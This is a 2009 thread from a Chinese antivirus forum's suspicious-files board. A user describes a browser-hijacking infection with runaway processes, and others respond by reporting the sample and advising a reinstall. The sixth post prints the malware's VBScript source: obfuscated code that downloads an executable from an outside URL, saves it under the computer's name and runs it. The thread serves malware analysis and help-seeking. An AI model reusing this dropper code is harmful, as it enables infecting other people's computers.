networkedition 让我传来的ABCD2.EXE和日记的 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 可疑文件交流 networkedition 让我传来的ABCD2.EXE和日记的

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

networkedition 让我传来的ABCD2.EXE和日记的

电脑玩完了初生襁褓狮帖子:3 注册: 2009-11-18 来自:	发表于： 2009-11-18 15:05 \| 只看楼主短消息资料字号：小中大 1楼 networkedition 让我传来的ABCD2.EXE和日记的我在C:\Program Files\Common Files\Microsoft Shared\MSINFO里面没有找到iejore.exe 取消隐藏也没发现，就只有IEFILES5，IEINFO5.OCX和msinfo32这3个文件。进程数过多。。我最多时，有90多个进程出来，我本来还删了2个叫1和FF的文件夹，和ABCD2一样，是文件夹，但打不开，一打开就出现许多脚本文件。。。。但这个ABCD2我删不了，现在进程还是保持在50左右，CUP100% 我也把这文件上传到瑞星，说是病毒文件，但我用瑞星查杀不了，说没病毒。浏览器也给窃取，直接在电脑上弄一个网站的快捷方式，我直接点默认的IE浏览器，网站也就直接跳转到那网站，什么医疗，性病。。。。汗！开始菜单里也有网站快捷。。。我现在主页完全改不了，IE的IT选项打开，里面输入主页地址是灰的！用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6) 附件: 您所在的用户组无法下载或查看附件
电脑玩完了初生襁褓狮帖子:3 注册: 2009-11-18 来自:	分享到：

电脑玩完了初生襁褓狮帖子:3 注册: 2009-11-18 来自:	发表于： 2009-11-18 15:14 \| 只看楼主短消息资料字号：小中大 2楼回复：networkedition 让我传来的ABCD2.EXE和日记的貌似还修改BIOS，电脑的电源插上，自动开机，而且在那个黑色，用↑↓选什么一键还原前的那个画面，有GHOST的那个星星的画面时，就卡住了，右下角出现一个85的数字，画面下有F1什么的英文和F2什么什么的英文。。我按F2就是进BIOS画面，按F1就是如同正常开启了。。。
电脑玩完了初生襁褓狮帖子:3 注册: 2009-11-18 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-11-18 15:29 \| 短消息资料字号：小中大 3楼回复 2F 电脑玩完了的帖子反病毒区原帖已回复。 http://bbs.ikaka.com/showtopic-8678647.aspx
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-11-18 15:35 \| 短消息资料字号：小中大 4楼回复 1F 电脑玩完了的帖子样本已上报上报文件成功！查询编号：RS20091118152943390765 为查询文件分析结果，请记录此编号。谢谢您的参与！
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

abcl 拙长孩提狮帖子:96 注册: 2005-04-22 来自:	发表于： 2009-11-20 10:55 \| 短消息资料字号：小中大 5楼回复：networkedition 让我传来的ABCD2.EXE和日记的最好的办法就是磁盘格式化后重装
abcl 拙长孩提狮帖子:96 注册: 2005-04-22 来自:

夲號ヱ被ジ盜叱咤花甲狮帖子:7083 注册: 2008-08-21 来自:昆仑琼华派	发表于： 2009-11-20 12:52 \| 短消息资料字号：小中大 6楼回复: networkedition 让我传来的ABCD2.EXE和日记的以下内容： On Error Resume Next set ws2=createobject("wscript.shell") SYSTEMROOT=Ws2.Environment("process")("APPDATA") set wenv=ws2.environment("process") pcnames=wenv("computername") if pcnames="" then name="mstsc" else name=pcnames end if set ws2=nothing Set WshShell = WScript.CreateObject("WScript.Shell") Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.GetFile(wscript.scriptfullname) If objFile.Attributes = objFile.Attributes AND 2 Then objFile.Attributes = objFile.Attributes XOR 2 End If Do Set fso = CreateObject("Scripting.FileSystemObject") If fso.FileExists(""&SYSTEMROOT&"\"&name&".exe") Then Else Set xxxx = CreateObject("Mic"&"rosoft.XM"&"L"&"HTTP") with xxxx .Open "GET","http://www.turuan.net/down/game.exe",0 .Send() end with Set szy = CreateObject("AD"&"ODB.St"&"r"&"eam") with szy .type = eval("1") .Mode = eval("3") .open() .write eval("xxxx.res"&"po"&"nse"&"Bod"&"y") .SaveToFile ""&SYSTEMROOT&"\"&name&".exe",eval ("2") end with WshShell.Run (""""&SYSTEMROOT&"\"&name&".exe""") End If Set fso = Nothing pr&name&".exe" set wmi=getobject("winmgmts:{impersonationlevel=impersonate}\\.\root\cimv2") set procs=wmi.execquery("select * from win32_process") flag=true for each proc in procs if strcomp(proc.name,proname)=0 then flag=false exit for end if 附件: 您所在的用户组无法下载或查看附件附件: 您所在的用户组无法下载或查看附件附件: 您所在的用户组无法下载或查看附件附件: 您所在的用户组无法下载或查看附件附件: 您所在的用户组无法下载或查看附件夲號ヱ被ジ盜最后编辑于 2009-11-20 13:00:12
夲號ヱ被ジ盜叱咤花甲狮帖子:7083 注册: 2008-08-21 来自:昆仑琼华派

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT